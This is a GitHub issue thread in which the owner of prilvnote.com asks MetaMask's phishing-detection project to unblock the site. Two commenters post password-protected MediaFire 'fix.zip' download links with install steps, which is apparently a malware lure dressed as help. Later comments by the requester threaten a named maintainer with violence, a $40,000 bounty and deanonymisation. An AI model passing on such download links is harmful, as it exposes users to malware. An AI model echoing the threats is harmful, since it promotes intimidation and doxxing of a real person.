### ISSUE TITLE
[Unblock Legitimate Site] prilvnote.com

### ISSUE THREAD

**Issue by Sobol308** [MetaMask/eth-phishing-detect#79259]
**prilvnote.com:**

**Details:** *Someone added our site to the phishing detection service - our site has nothing to do with cryptocurrency wallets or cryptocurrency - please remove the site from the blacklist*

- [x] I have checked to make sure that [there is not a duplicate issue](https://github.com/MetaMask/eth-phishing-detect/issues)

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 409H** [comment]
Merged in https://github.com/MetaMask/eth-phishing-detect/pull/79564

**Comment by 409H** [comment]
Will be blocked again: https://github.com/MetaMask/eth-phishing-detect/issues/29814

**Comment by Sobol308** [comment]
I don't feel comfortable having a conversation here, can we switch to
Telegram?

чт, 29 авг. 2024 г. в 22:04, Harry ***@***.***>:

**Comment by Sobol308** [comment]
> Will be blocked again: #29814

I wonder what the reason is? Can I get a link to your rules where you can justify this blocking? What connections do you see with MetaMask? Should I write a complaint about your actions? And the same question, what does the link to the site privnote.co have to do with me???

**Comment by Sobol308** [comment]
harry denley I will turn your life into hell I promise you and I will spend any money to teach you good manners for unfair blocking your hands will be broken with which you click on the keyboard - I am already looking for performers! Let's see how heroically you will click on the keys and ruin people's business! I will offer a reward of $ 40,000 so that you will be turned into a piece of shit!

**Comment by Sobol308** [comment]
I will spend most of my money and income on deanoning you and your nerds - you think you can accept and decide which site will be blocked here, I will prove you wrong
